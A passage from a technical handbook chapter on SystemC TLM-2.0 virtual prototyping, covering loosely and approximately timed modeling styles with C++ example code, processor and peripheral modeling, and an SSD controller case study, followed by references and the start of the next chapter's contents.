1666 TLM-2.0 Language Reference Manual (IEEE Standard for Standard Sys-
temC Language Reference Manual 2012) identifies the following styles for the
transaction-level modeling of memory-mapped on-chip bus protocols:
• The Loosely Timed (LT) modeling style aims to maximize the simulation speed
by abstracting the communication to the highest level and by minimizing the
synchronization overhead.
• The Approximately Timed (AT) modeling style focuses on the timing of the
transactions between different components by providing multiple timing points
for modeling individual transaction phases.
As illustrated in Fig. 10, both LT and AT modeling styles share the same concepts of sockets, generic payload, and an extension mechanism for modeling memory-mapped communication.

A Virtual Prototype for software development has to fulfill the following requirements:
• Register accuracy: In order to run embedded software correctly, the memory and memory-mapped register layout and behavior of all relevant components should be modeled.
• Functional fidelity: All relevant responses of the target hardware should be modeled.
• Simulation speed: It is important that the Virtual Prototype can execute the embedded software at a speed that is as close as possible to the real time of the actual target device.
The Loosely Timed (LT) modeling style is intended to maximize the execution speed
while providing the minimal level of required timing fidelity. The key concepts in
the TLM-2.0 standard to achieve high simulation speed on top of the event-driven
SystemC simulation kernel are temporal decoupling, the Direct Memory Interface
(DMI), and blocking communication.
The LT modeling style reflects the software interactions with hardware and how
register content is updated. For example, timer interrupts happen roughly at the
intended time to simulate the timing calibration loop in a Linux boot, or to execute
real-time software in automotive Electronic Control Units (ECUs).
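The sketch below shows these three mechanisms working together on an invented core/memory pair: the initiator is temporally decoupled through a quantum keeper, communicates via blocking b_transport calls, and upgrades to a DMI pointer once the target permits it. The 100 ns quantum and all latencies are illustrative.

#include <systemc>
#include <tlm>
#include <tlm_utils/simple_initiator_socket.h>
#include <tlm_utils/simple_target_socket.h>
#include <tlm_utils/tlm_quantumkeeper.h>
#include <cstring>
using namespace sc_core;

// LT memory that grants a Direct Memory Interface (DMI) pointer.
SC_MODULE(Memory) {
  tlm_utils::simple_target_socket<Memory> socket;
  unsigned char mem[64];
  SC_CTOR(Memory) : socket("socket") {
    socket.register_b_transport(this, &Memory::b_transport);
    socket.register_get_direct_mem_ptr(this, &Memory::get_dmi);
  }
  void b_transport(tlm::tlm_generic_payload& t, sc_time& delay) {
    if (t.is_write()) std::memcpy(mem + t.get_address(), t.get_data_ptr(), t.get_data_length());
    else              std::memcpy(t.get_data_ptr(), mem + t.get_address(), t.get_data_length());
    delay += sc_time(10, SC_NS);
    t.set_dmi_allowed(true);              // invite the initiator to use DMI
    t.set_response_status(tlm::TLM_OK_RESPONSE);
  }
  bool get_dmi(tlm::tlm_generic_payload&, tlm::tlm_dmi& d) {
    d.allow_read_write();                 // grant a raw pointer to the storage
    d.set_dmi_ptr(mem);
    d.set_start_address(0);
    d.set_end_address(63);
    return true;
  }
};

// Temporally decoupled initiator: runs ahead of the SystemC kernel and only
// yields when its local time offset exceeds the global quantum.
SC_MODULE(FastCore) {
  tlm_utils::simple_initiator_socket<FastCore> socket;
  tlm_utils::tlm_quantumkeeper qk;
  unsigned char* dmi_ptr = nullptr;
  SC_CTOR(FastCore) : socket("socket") { SC_THREAD(run); }
  void run() {
    qk.reset();
    for (unsigned pc = 0; pc < 1000; ++pc) {
      qk.inc(sc_time(1, SC_NS));          // account one "instruction"
      if (dmi_ptr) {
        dmi_ptr[pc % 64]++;               // fast path: plain pointer access
      } else {
        tlm::tlm_generic_payload t;
        unsigned char byte = 1;
        sc_time delay = qk.get_local_time();
        t.set_command(tlm::TLM_WRITE_COMMAND);
        t.set_address(pc % 64);
        t.set_data_ptr(&byte);
        t.set_data_length(1);
        socket->b_transport(t, delay);
        qk.set(delay);                    // adopt the annotated delay
        tlm::tlm_dmi d;
        if (t.is_dmi_allowed() && socket->get_direct_mem_ptr(t, d))
          dmi_ptr = d.get_dmi_ptr();      // assumes the region covers all of mem
      }
      if (qk.need_sync()) qk.sync();      // yield at the quantum boundary
    }
  }
};

int sc_main(int, char**) {
  tlm::tlm_global_quantum::instance().set(sc_time(100, SC_NS));
  FastCore core("core");
  Memory mem("mem");
  core.socket.bind(mem.socket);
  sc_start();
  return 0;
}

The larger the global quantum, the fewer kernel synchronizations occur; this is the central speed-versus-timing-fidelity knob of the LT style.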
Fig. 11 TLM-2.0 Protocols for Loosely Timed (left) and Approximately Timed (right)
The Approximately Timed (AT) modeling style targets architecture analysis use-cases, where the following aspects matter:
• Scalable timing accuracy: The accuracy requirements depend on the goal of the
project. For example, an abstract model of a DRAM is good enough for exploring
HW/SW partitioning, but a highly accurate model is needed for optimizing the
configuration of the DRAM memory controller.
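The following sketch illustrates the resulting non-blocking, phase-based handshake of the AT base protocol with a single outstanding transaction; module names and the 40 ns processing latency are invented for the example.

#include <systemc>
#include <tlm>
#include <tlm_utils/simple_initiator_socket.h>
#include <tlm_utils/simple_target_socket.h>
#include <iostream>
using namespace sc_core;

// Target: accepts BEGIN_REQ, ends the request phase immediately, and sends
// BEGIN_RESP from a separate process after an internal processing latency.
SC_MODULE(ATTarget) {
  tlm_utils::simple_target_socket<ATTarget> socket;
  tlm::tlm_generic_payload* pending = nullptr;   // one outstanding transaction
  sc_event resp_ev;
  SC_CTOR(ATTarget) : socket("socket") {
    socket.register_nb_transport_fw(this, &ATTarget::nb_fw);
    SC_THREAD(send_response);
  }
  tlm::tlm_sync_enum nb_fw(tlm::tlm_generic_payload& t, tlm::tlm_phase& ph, sc_time&) {
    if (ph == tlm::BEGIN_REQ) {
      pending = &t;
      resp_ev.notify(40, SC_NS);   // model internal processing latency
      ph = tlm::END_REQ;           // request phase done, channel is free again
      return tlm::TLM_UPDATED;
    }
    return tlm::TLM_COMPLETED;     // END_RESP arriving from the initiator
  }
  void send_response() {
    while (true) {
      wait(resp_ev);
      tlm::tlm_phase ph = tlm::BEGIN_RESP;
      sc_time d = SC_ZERO_TIME;
      pending->set_response_status(tlm::TLM_OK_RESPONSE);
      socket->nb_transport_bw(*pending, ph, d);
    }
  }
};

// Initiator: starts the request phase and completes the transaction when the
// response phase arrives on the backward path.
SC_MODULE(ATInitiator) {
  tlm_utils::simple_initiator_socket<ATInitiator> socket;
  SC_CTOR(ATInitiator) : socket("socket") {
    socket.register_nb_transport_bw(this, &ATInitiator::nb_bw);
    SC_THREAD(run);
  }
  tlm::tlm_sync_enum nb_bw(tlm::tlm_generic_payload&, tlm::tlm_phase& ph, sc_time&) {
    if (ph == tlm::BEGIN_RESP) {
      std::cout << sc_time_stamp() << ": response received" << std::endl;
      return tlm::TLM_COMPLETED;   // closes the response phase in place
    }
    return tlm::TLM_ACCEPTED;
  }
  void run() {
    tlm::tlm_generic_payload t;
    unsigned char byte = 0;
    t.set_command(tlm::TLM_READ_COMMAND);
    t.set_address(0);
    t.set_data_ptr(&byte);
    t.set_data_length(1);
    tlm::tlm_phase ph = tlm::BEGIN_REQ;
    sc_time d = SC_ZERO_TIME;
    socket->nb_transport_fw(t, ph, d);   // phase by phase, not one blocking call
    wait(100, SC_NS);                    // keep the payload alive until done
  }
};

int sc_main(int, char**) {
  ATInitiator i("initiator");
  ATTarget t("target");
  i.socket.bind(t.socket);
  sc_start();
  return 0;
}

Note how the target returns TLM_UPDATED to finish the request phase early: the separate timing points are exactly what allows overlapping transactions and realistic arbitration modeling.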
Extended AT
The TLM-2.0 AT base protocol has limited expressiveness when it comes to
accurately representing real-world on-chip bus protocols:
• It does not provide timing points for the individual data beats of a burst transfer.
This becomes particularly problematic when interfacing TLM-2.0 AT-BP with
cycle accurate or RTL models.
• It requires all address and data information to be available for writes at the start
of the transaction. Equally, all data for a read response needs to be available at
the start of the response.
• It is not possible to have concurrent read and write requests, as, e.g., required by
the AMBA AXI protocol (AMBA AXI and ACE Protocol Specification 2013).
Fig. 12 TLM-2.0 Extended Fast Timed Protocol example representing AMBA AXI read (top) and
AXI write (bottom)
Protocol specific extensions can break the interoperability between the TLM-2.0 AT Base Protocol (AT-BP) and extended AT models. The Fast Timed (FT) modeling style is therefore defined using ignorable extensions, in a way that enables the definition of more accurate protocols while preserving interoperability with the AT-BP:
• FT extends the generic payload with an optional attribute indicating the current
state in the protocol state machine.
• FT uses extended sockets that provide the necessary protocol conversion logic
such that conversions are only done when required and can be inserted automat-
ically. This way the extended set of FT protocol phases can be mapped to the
standard set of AT-BP phases.
• For each specific protocol, protocol-specific attributes are added as needed, e.g.,
for cacheability, out-of-order transactions, etc. This should be limited to those
attributes that are not already covered by the TLM-2.0 base protocol, so the
extended protocol can fall back to the more generic AT base protocol.
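The extension mechanism underneath can be sketched as follows; the attribute names are invented, and a production FT protocol would define one such extension per on-chip bus protocol.

#include <tlm>

// Hypothetical protocol-specific attributes carried as a TLM-2.0 extension.
// A model that does not know this extension never asks for it, which is what
// makes the extension "ignorable".
struct ProtocolExt : tlm::tlm_extension<ProtocolExt> {
  unsigned beat = 0;        // current data beat of a burst (invented attribute)
  bool cacheable = false;   // example protocol attribute (invented)
  tlm_extension_base* clone() const override { return new ProtocolExt(*this); }
  void copy_from(const tlm_extension_base& other) override {
    *this = static_cast<const ProtocolExt&>(other);
  }
};

// A protocol-aware sender attaches the extension to the generic payload.
void annotate(tlm::tlm_generic_payload& trans, ProtocolExt* ext) {
  ext->beat = 3;
  ext->cacheable = true;
  trans.set_extension(ext);  // with memory-managed payloads, set_auto_extension()
                             // lets the pool release the extension automatically
}

// A protocol-aware receiver reads the attribute; a plain AT-BP model simply
// falls back to a sensible default when the extension is absent.
bool is_cacheable(tlm::tlm_generic_payload& trans) {
  ProtocolExt* ext = trans.get_extension<ProtocolExt>();
  return ext ? ext->cacheable : false;
}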
Specific FT protocols represent the full set of protocol phases and transaction
attributes of the original on-chip bus protocol. This enables the creation of fully
cycle accurate FT models, where the accuracy is not limited by the expressiveness
of the TLM protocol, even though certain details of the model-internal behavior
might be abstracted. Accordingly, fully cycle accurate transactors between TLM
models and pin-level RTL models can be created, which map the TLM FT protocol
phases to RTL pin events and vice-versa. This way, implementation accurate RTL
models can be used in the context of accurate TLM models.
TLM-2.0 Summary
The goal of the IEEE 1666 TLM-2.0 standard is to enable model interoperability at
the level of SoC building blocks, like processors, buses, memories, or peripherals.
For this purpose, TLM-2.0 standardizes the modeling interface for memory-mapped on-chip bus protocols.
Levels of Abstraction
Obviously, it would be preferable to have one single model that enables all VP
use-cases. Unfortunately, the vicious modeling triangle proclaims that any model
can only fulfill two of the three desirable attributes of being fast, accurate, and
economical to develop.
• LT models are fast and their development requires relatively low effort, but they
do not provide sufficient timing accuracy for architecture use-cases.
• RTL simulation or translation is accurate and cost-effective, but the simulation
speed is not sufficient to enable architecture exploration or SW development
related VP use-cases.
• Hand-written speed-optimized timing-accurate TLM models or RTL emulation
are both fast and accurate, but also rather expensive solutions.
One escape route from this vicious triangle is to generate fast timing accurate
models from a higher level formalized specification, but developing such technology
requires high initial investment and is only applicable to a constrained class of
target IP (Hoffmann et al. 2001; ASIP Designer; Tensilica Customizable Processors;
Lecler and Baillieu 2011).
Commercial TLM libraries abandon the goal of providing a one-fits-all solution
and typically focus on the more widely deployed SW related use-cases (Arm Fast
Models; Synopsys DesignWare TLM library). Vendors of interconnect and memory
controller IP that is critical for the SoC performance focus on providing Approximately Timed models for architecture analysis (Lecler and Baillieu 2011; Synopsys
Platform Architect). Embedded processor vendors often provide two versions of
models for their IP, one for SW use-cases and one for architecture use-cases, e.g.,
Arm’s Fast Models (Arm Fast Models) and Cycle Models (Arm Cycle Models),
Synopsys ARC nSIM and xCAM (DesignWare ARC nSIM), Tensilica TurboXim,
and cycle accurate ISS (Tensilica Customizable Processors). Open-source processor
modeling frameworks like gem5 provide multiple levels of abstraction for the
processor core and the memory sub-system to choose the most suitable speed-
accuracy trade-off for the respective modeling task (Binkert et al. 2011).
Processor Models
Programmable cores are obviously the key component of processor-based platforms,
and therefore the corresponding processor models play a critical role for the Virtual
Prototype. The technology used for the development of the processor models largely
determines the simulation speed and accuracy of the overall VP.
Please also refer to Chap. 25, “Processor Simulation and Characterization”, by Martin et al. for a more detailed description of the different abstraction levels of processor simulators.
• An Instruction Accurate ISS naturally fits with the Loosely Timed blocking
transport API and Direct Memory Interface. Also, the simulation loop of the
processor can be smoothly integrated with the temporal decoupling concept of
the LT API to achieve the highest possible simulation speed and still maintain
sufficient timing fidelity in the context of a multi-core VP (Engblom 2018).
• A Cycle-based ISS as well as RTL cores should be fitted with the non-blocking
transport interface of the Approximately Timed TLM-2.0 API, preferably an
extended version that enables the modeling of individual data phases. This way
the inherent accuracy of the processor model is preserved in the context of the
VP, such that the generated TLM traffic can be used for architecture use-cases
like performance analysis of caches, cache coherent interconnect, Network-on-
Chip and memory controllers, etc., all of which benefit from highly accurate
transactions sequences.
• Tracing, analysis, and scripting provide further added value for all VP use-cases.
The processor model needs to provide the necessary APIs to peek and poke
into local resources like registers, memories, performance counters, etc. Based
on these instrumentation APIs, Virtual Prototyping tools can visualize traces of
instructions, function calls, and register access as well as OS-aware tracing of
context switches.
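The kind of instrumentation interface this implies can be sketched as follows; all names are hypothetical, since every vendor defines its own peek/poke and tracing API.

#include <cstdint>
#include <functional>
#include <string>
#include <utility>
#include <vector>

// Hypothetical instrumentation facade of a processor model: tools peek and
// poke architectural state and subscribe to trace callbacks without any
// modification of the target software.
class ProcessorModel {
public:
  virtual ~ProcessorModel() = default;

  // Non-intrusive access to local resources (registers, counters, memories).
  virtual uint64_t peek(const std::string& resource) const = 0;
  virtual void     poke(const std::string& resource, uint64_t value) = 0;

  // Trace hook, invoked for every retired instruction. An OS-aware tool can
  // combine this with peeks of, e.g., the task pointer register to
  // reconstruct context switches.
  using InsnHook = std::function<void(uint64_t pc)>;
  void on_instruction(InsnHook hook) { hooks_.push_back(std::move(hook)); }

protected:
  void notify_instruction(uint64_t pc) {
    for (auto& h : hooks_) h(pc);    // drives instruction and function tracing
  }

private:
  std::vector<InsnHook> hooks_;
};

A debugger front-end would, for instance, call peek("pc") while the simulation is stopped, something that real hardware only supports through far more intrusive means.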
TLM models of peripheral components are typically structured into separate layers:
• The storage and synchronization layer stores the data of write transactions and
returns the data in case of read transactions.
• The behavior models the algorithm or state machine of the component. The
behavior is triggered when certain memories or registers in the storage layer are
accessed.
The different needs in timing accuracy can be addressed by separating the code
that models the timing of the component from the pure functional behavior. SCML
supports this separation by providing modeling objects for each of these layers.
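A plain-SystemC sketch of this layering (deliberately not the proprietary SCML API) might look as follows for a hypothetical timer peripheral; the register map, delay, and behavior are invented for illustration.

#include <systemc>
#include <tlm>
#include <tlm_utils/simple_target_socket.h>
#include <cstdint>
using namespace sc_core;

SC_MODULE(TimerPeripheral) {
  tlm_utils::simple_target_socket<TimerPeripheral> socket;
  uint32_t regs[2] = {0, 0};          // storage layer: 0x0 = CTRL, 0x4 = COUNT
  sc_event started;
  static const sc_time REG_DELAY;     // timing layer, kept in one place

  SC_CTOR(TimerPeripheral) : socket("socket") {
    socket.register_b_transport(this, &TimerPeripheral::b_transport);
    SC_THREAD(behavior);
  }

  // Storage and synchronization layer: register access triggers callbacks.
  void b_transport(tlm::tlm_generic_payload& t, sc_time& delay) {
    uint32_t idx = t.get_address() / 4;             // assumes aligned 32-bit access
    uint32_t* data = reinterpret_cast<uint32_t*>(t.get_data_ptr());
    if (t.is_write()) {
      regs[idx] = *data;
      if (idx == 0 && (regs[0] & 1)) started.notify();  // write callback
    } else {
      *data = regs[idx];                                // read callback
    }
    delay += REG_DELAY;
    t.set_response_status(tlm::TLM_OK_RESPONSE);
  }

  // Behavior layer: the actual state machine of the component.
  void behavior() {
    while (true) {
      wait(started);
      while (regs[0] & 1) { wait(1, SC_US); regs[1]++; }
    }
  }
};
const sc_time TimerPeripheral::REG_DELAY(5, SC_NS);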
The SCML modeling library greatly helps to reduce the modeling effort of
custom peripheral components. In the context of commercial Virtual Prototyping
projects, the effort for creating models can be further reduced by using model gen-
eration tools. For example, an SCML-based peripheral model can be automatically
generated from an IP-XACT description of the register interface.
SSD Controller SoC Case Study

The last section of this chapter illustrates the construction and usage of Virtual
Prototypes based on an SSD controller SoC case study. Especially in the area of
data center storage, this is a representative example of a demanding and competitive
application domain, both in terms of complex multi-core SoC architecture and
complex software stacks in the critical path of the system performance. The
following sub-sections give a brief introduction to SSD controllers and then describe
the refinement from a Loosely Timed Virtual Prototype for SW development to a timing accurate Virtual Prototype for performance analysis.
Fig. 14 Typical SSD system with SoC block diagram (right), SSD firmware components (middle),
write and read operation (left)
Loosely Timed Virtual Prototype of the SSD SoC
As shown on the bottom right side of Fig. 15, the first step is to build a fast
Loosely Timed Virtual Prototype, which enables the execution of the unmodified
SSD firmware stack. This example is based on an Arm CPU, so the CPU subsystem
is modeled using an Arm Fast Model of the Cortex R processor and the Generic
Interrupt Controller (GIC) (Arm Fast Models). The host interface is based on the
Synopsys PCIe controller, which is available in the TLM model library of Synopsys
Virtualizer, a Virtual Prototyping environment for software development use-cases
(Synopsys Virtualizer; Synopsys DesignWare TLM library). The same applies to
the Loosely Timed models of the generic NVMe controller, interconnect, memory,
DMA controller, and UART. The SSD firmware in this case-study is based on the
OpenSSD project, see Song et al. (2014) and The OpenSSD Project.
Only the Flash Controller is a custom IP block and therefore requires a dedicated
modeling effort. Following the modeling pattern based on the SCML modeling
library (The SystemC Modeling Library) as described in the last paragraph of
section “Building TLM Components for Virtual Prototypes”, the actual coding
is reduced to the functional behavior. The modeling effort is further reduced by
using the Virtualizer TLM Creator tool with its library of reusable TLM building blocks for basic components like FIFO buffers, state machines, and the ONFI Flash protocol interface. Apart from the required functionality, the flash controller model is annotated with configurable timing to take the latency of Flash operations into account. Also, a variety of custom monitors are added to trace and analyze, e.g., the IO operations per second, the flash commands and internal state, and the accessed flash blocks. Enriching the flash controller model with timing annotation and analysis instrumentation requires some additional modeling effort, but greatly increases the usability for SW development and architecture analysis use-cases.

Fig. 15 Loosely Timed Virtual Prototype of SSD controller, connected to embedded software debugger, platform debugger, and OS for end-to-end software testing
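The pattern of configurable timing annotation plus analysis instrumentation can be sketched as follows; parameter names and latencies are invented to indicate where such hooks attach, not how the actual case-study model is written.

#include <systemc>
#include <tlm>
#include <tlm_utils/simple_target_socket.h>
#include <cstdint>
using namespace sc_core;

SC_MODULE(FlashCtrl) {
  tlm_utils::simple_target_socket<FlashCtrl> socket;
  sc_time read_latency, program_latency;   // configurable timing annotation
  uint64_t ops = 0;                        // analysis instrumentation (e.g., IOPS)

  FlashCtrl(sc_module_name n, sc_time rd, sc_time prog)
    : sc_module(n), socket("socket"), read_latency(rd), program_latency(prog) {
    socket.register_b_transport(this, &FlashCtrl::b_transport);
  }

  void b_transport(tlm::tlm_generic_payload& t, sc_time& delay) {
    // Annotate the configured flash operation latency onto the transaction.
    delay += t.is_read() ? read_latency : program_latency;
    ++ops;  // a real model would feed command/state monitors from here
    t.set_response_status(tlm::TLM_OK_RESPONSE);
  }
};

// Usage: FlashCtrl flash("flash", sc_time(50, SC_US), sc_time(500, SC_US));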
By itself, the Loosely Timed Virtual Prototype of the SSD controller can be used
to test the embedded firmware. The real value and practical usability come from the
integration of the SW-VP into an ecosystem of software development tools, like embedded software debuggers and the host OS (see Fig. 15).
The PCIe Virtual IO connectivity enables the testing of the firmware on the SSD
device in the context of the host driver and host application. This way, the VP
of the SSD controller can be mounted, enumerated, formatted using standard
Linux commands, and accessed from applications like file browsers or benchmark
programs, just like a real NVMe device. This end-to-end testing of the SSD firmware
stack in the context of the host application and driver stack greatly increases the
embedded firmware quality.
Further important use-cases are scripting, regression, and continuous integration
to automate the testing of the SSD firmware, as well as coverage-driven fault
injection to further increase the SW quality beyond the expected application context.
Accurate Virtual Prototype of SSD SoC

The Loosely Timed (LT) platform of an SSD controller is optimized for high
simulation speed and bit-accurate behavior but does not model the detailed timing.
To enable performance analysis and optimization of the firmware and the SoC
architecture, the fast functional models of the processor, the interconnect, and
the DRAM memory controller are replaced with their accurate counterparts. The
remaining models are not in the critical path of the performance analysis and
stay at the LT level. The timing annotation of the LT flash controller model is
sufficiently accurate to model the delay of the Flash operations. To simplify the
directed performance testing, the PCIe and NVMe host interfaces are removed.
Instead, the host commands are poked into the CPU memory space using simulation
scripts to directly trigger the respective FTL operation.
In this example, the instruction accurate ISS of the Arm CPU is replaced by
the corresponding Arm Cycle Model (Arm Cycle Models). Then the flat untimed
LT memory is exchanged with an accurate model of the Synopsys DesignWare
uMCTL2 DDR memory controller. The last step is to replace the simple LT bus
model with a cycle accurate model of Arm CoreLink NIC400. Both the uMCTL2
and NIC400 TLM performance models are available in the model library of
Synopsys Platform Architect, a Virtual Prototyping environment for architecture
use-cases (Synopsys Platform Architect). Based on this incremental refinement,
the Loosely Timed SW-VP is converted into a Virtual Prototype for architecture
analysis. The resulting architecture model of the SSD controller is shown on the left
side of Fig. 16.
The main value of running a timing accurate Virtual Prototype is provided by the
analysis results generated by the simulation. As an example, the charts in the middle
of Fig. 16 show from top to bottom the event statistics of the CPU Performance
Monitor Unit (PMU), the firmware function trace, the bus throughput, and the data
channel utilization of the DDR memory. Especially the PMU analysis provides great
insight into how efficiently the CPU subsystem executes the specific firmware, e.g.,
the performance of the branch predictor, the different reasons for CPU pipeline
stalls, or the hits and misses in the level one instruction and data caches.
This level of detail is essential for root cause analysis, to identify and fix the
reasons for performance issues, either in the firmware or the HW architecture.
However, looking at the results of one simulation at a time is not efficient for
analyzing design trade-offs. The latter is more effectively done using sensitivity
analysis with pivot charts as shown on the right side of Fig. 16. Here the aggregated
KPIs from a parameter sweep can be compared, highlighting the impact of design
and configuration parameters on various metrics.
The specific example shows the execution time for the boot sequence (blue bars)
and for processing 10 host commands (orange bars), depending on a variety of
settings for the CPU clock frequency, the DDR memory speed, and the depth of
the bus transaction pipeline. The pivot chart shows a saturation of the performance
at the lower as well as the higher end of the spectrum, and a clear performance
increase in the middle.
Fig. 16 Virtual Prototype for performance analysis of SSD controller (left), detailed analysis
results (middle), and sensitivity analysis (right)
Similar analysis would be possible with the RTL model of the SSD controller,
but only at a much later point in time of the development process. The cycle accurate
TLM model provides much better visibility for HW and SW performance analysis
and faster turn-around time for parametric what-if analysis.
SSD Case Study Summary

This section summarizes the benefits of Virtual Prototypes in the context of this SSD
controller case study.
The SW-VP is first used for the bring-up of the SSD firmware stack, in particular
the porting of the device drivers of the NAND flash controller and the PCIe host
interface. The PCIe Virtual I/O concept further expands the scope for firmware
development and testing on Virtual Prototypes. It enables the validation in the
context of real-world applications for PCIe end point devices, like SSD controllers,
Smart Network Interface Cards (SmartNIC), or AI accelerator cards. This expands
the range of available test scenarios, enabling host side and device side software
to be built, run, and tested in the target environment. Similar benefits apply for the
virtual and real-world connectivity of other interface IP, like USB or Ethernet.
Refining the Loosely Timed SW-VP into a timing accurate VP enables the joint
hardware and software performance analysis and optimization. Especially the
analysis of performance counters in cycle accurate processor models provides
insight into cache performance and micro-architecture effects like branch prediction
and pipeline stalls. The accurate traffic can be used for interconnect and memory
performance optimization.
The best return on investment comes from taking advantage of both software
and architecture use-cases. Part of the TLM models can be re-used between the
loosely timed and timing accurate Virtual Prototype to reduce the modeling effort.
Having the firmware running on the SW-VP as a known good starting point greatly
increases the productivity for the creation and bring-up of the more accurate and
slower performance analysis platform.
Conclusion and Outlook

This chapter reviews the state of the art in Virtual Prototyping, with a focus on
use-cases around early architecture analysis and software development, including
an introduction to the underlying SystemC based TLM modeling paradigm.
The use of Virtual Prototypes for architecture analysis during the specification
phase is growing continuously, as it becomes increasingly difficult to predict the
non-functional properties like power and performance of heterogeneous many-
processor SoCs. Here, Virtual Prototypes help to reduce the risk of under-designing
and over-designing, especially as chip design projects increasingly require deep
collaboration of different teams and even across multiple companies.
Trademarks
Synopsys, Virtualizer, Platform Architect, and DesignWare are registered trade-
marks of Synopsys, Inc.
Arm, Cortex, and AMBA are registered trademarks of Arm Limited. “Arm” is
used to represent Arm Holdings plc.; its operating company Arm Limited; and its
regional subsidiaries.
All other brands or product names are the property of their respective holders.
Disclaimer
The opinions and observations expressed in this publication are my own. They do
not purport to reflect the opinions, views, or intentions of my employer Synopsys,
Inc.
References
Android Studio. https://developer.android.com/studio
Arm Cycle Model Studio. https://www.arm.com/products/development-tools/simulation/cycle-
model-studio
Arm Cycle Models. https://developer.arm.com/tools-and-software/simulation-models/cycle-
models
Arm Development Studio. https://www.arm.com/products/development-tools
Arm Fast Models. https://developer.arm.com/tools-and-software/simulation-models/fast-models
Arm Fixed Virtual Platforms. https://developer.arm.com/tools-and-software/simulation-models/
fixed-virtual-platforms
ASIP Designer. https://www.synopsys.com/designware-ip/processor-solutions/asips-tools.html
CEVA. https://www.ceva-dsp.com
DesignWare ARC nSIM. https://www.synopsys.com/dw/ipdir.php
Functional Mock-up Interface (FMI). https://fmi-standard.org
Intel CoFluent. https://www.intel.com/content/www/us/en/cofluent/overview.html
Intel Integrated Simulation Infrastructure with Modeling (ISIM). https://software.intel.com/
content/www/us/en/develop/tools/integrated-simulation-infrastructure.html
Jenkins Automation Server for Continuous Integration/Continuous Delivery. https://www.jenkins.io/
Lauterbach Development Tools. https://www.lauterbach.com
Mirabilis VisualSim. https://www.mirabilisdesign.com
Oracle Virtual Box. https://www.virtualbox.org
Silver Virtual ECU. https://www.synopsys.com/verification/virtual-prototyping/virtual-ecu/silver.
html
Simulink. https://www.mathworks.com/products/simulink.html
Synopsys DesignWare TLM library. https://www.synopsys.com/verification/virtual-prototyping/
virtual-prototyping-models/designware-tlm-library.html
Synopsys Platform Architect. https://www.synopsys.com/verification/virtual-prototyping/
platform-architect.html
Synopsys Virtualizer. https://www.synopsys.com/verification/virtual-prototyping/virtualizer.html
Tensilica Customizable Processors. https://ip.cadence.com/ipportfolio/tensilica-ip
The Modelica Association. https://modelica.org
The OpenSSD Project. http://www.openssd.io
The Software Freedom Conservancy. QEMU the fast processor emulator. https://www.qemu.org
The SystemC Modeling Library (SCML). http://www.synopsys.com/cgi-bin/slcw/kits/reg.cgi
Tool Command Language (TCL). http://www.tcl.tk
Verilator. https://www.veripool.org/verilator
IEEE Standard for Standard SystemC Language Reference Manual (2012) IEEE Std 1666-2011
(Revision of IEEE Std 1666-2005), pp 1–638
Guerra L, Fitzner J, Talukdar D, Schlager C, Tabbara B, Zivojnovic V (1999) Cycle and phase
accurate DSP modeling and integration for HW/SW co-verification. In: Proceedings 1999
design automation conference (Cat. No. 99CH36361), pp 964–969
Gupta RK, De Micheli G (1993) Hardware-software cosynthesis for digital systems. IEEE Des
Test 10(3):29–41
Hellestrand G (1999) The revolution in systems engineering. IEEE Spectr 36(9):43–51
Hoffmann A, Kogel T, Nohl A, Braun G, Schliebusch O, Wahlen O, Wieferink A, Meyr H (2001)
A novel methodology for the design of application-specific instruction-set processors (ASIPS)
using a machine description language. IEEE Trans Comput-Aided Des Integr Circuits Syst
20(11):1338–1354
Huang G, Hu J, He Y, Liu J, Ma M, Shen Z, Wu J, Xu Y, Zhang H, Zhong K, Ning X, Ma Y, Yang
H, Yu B, Yang H, Wang Y (2021) Machine learning for electronic design automation: a survey
Jünger L, Zurstraßen N, Kogel T, Keding H, Leupers R (2020) Amaix: a generic analytical model
for deep learning accelerators. In: Orailoglu A, Jung M, Reichenbach M (eds) Embedded
computer systems: architectures, modeling, and simulation. Springer International Publishing,
Cham, pp 36–51
Kang K, Park S, Bae B, Choi J, Lee S, Lee B, Lee JB (2019) Seamless SoC verification using
virtual platforms: an industrial case study. In: Design, automation test in Europe conference
exhibition (DATE), pp 1204–1205
Kempf T, Dörper M, Leupers R, Ascheid G, Meyr H, Kogel T, Vanthournout B (2005) A
modular simulation framework for spatial and temporal task mapping onto multi-processor soc
platforms. In: Proceedings of the conference on design, automation & test in Europe (DATE),
Munich
Keutzer K, Newton A, Rabaey J, Sangiovanni-Vincentelli A (2000) System-level design: orthog-
onalization of concerns and platform-based design. IEEE Trans Comput-Aided Des Integr
Circuits Syst 19(12):1523–1543
Kienhuis B, Deprettere E, Vissers K, Van Der Wolf P (1997) An approach for quantitative analysis
of application-specific dataflow architectures. In: Proceedings IEEE international conference
on application-specific systems, architectures and processors, pp 338–349
Kogel T (2006) Peripheral modeling for platform driven ESL design. In: Burton M, Morawiec A
(eds) Platform based design at the electronic system level. Springer, New York, pp 71–85
Kogel T (2017) Synopsys virtual prototyping for software development and early architecture
analysis. In: Ha S, Teich J (eds) Handbook of hardware/software codesign. Springer, Dordrecht,
pp 1127–1159
Krishnan S, Wan Z, Bharadwaj K, Whatmough P, Faust A, Neuman S, Wei GY, Brooks D, Reddi VJ (2021) AutoPilot: automating SoC design space exploration for SWaP constrained autonomous UAVs
Lapedus M (2018) Big trouble at 3 nm. https://semiengineering.com/big-trouble-at-3nm
Lecler JJ, Baillieu G (2011) Application driven network-on-chip architecture exploration &
refinement for a complex SoC. Des Autom Embed Syst 15(2):133–158
Liao S, Tjiang S, Gupta R (1997) An efficient implementation of reactivity for modeling hardware
in the scenic design environment. In: Proceedings of the 34th design automation conference,
pp 70–75
Liebel G, Marko N, Tichy M, Leitner A, Hansson J (2018) Model-based engineering in the
embedded systems domain: an industrial survey on the state-of-practice. Softw Syst Model
17(1):91–113
Martin G (1998) Design methodologies for system level IP. In: Proceedings of the conference on
design, automation and test in Europe. IEEE Computer Society, pp 286–289
Mäenpää M (2020) Virtualized CPU usage in SoC verification. Master's thesis, University of Oulu, Faculty of Information Technology and Electrical Engineering. http://urn.fi/URN:NBN:fi:oulu-202008282897
Micheloni R, Marelli A, Eshghi K (2018) Inside solid state drives (SSDs). Springer series in advanced microelectronics. Springer, Singapore. https://books.google.de/books?id=UtNjDwAAQBAJ
FPGA-Specific Compilers 28
N. Srivastava, G. Liu, Y.-H. Lai, and Z. Zhang
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 990
Existing HLS Compilers and Programming Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 992
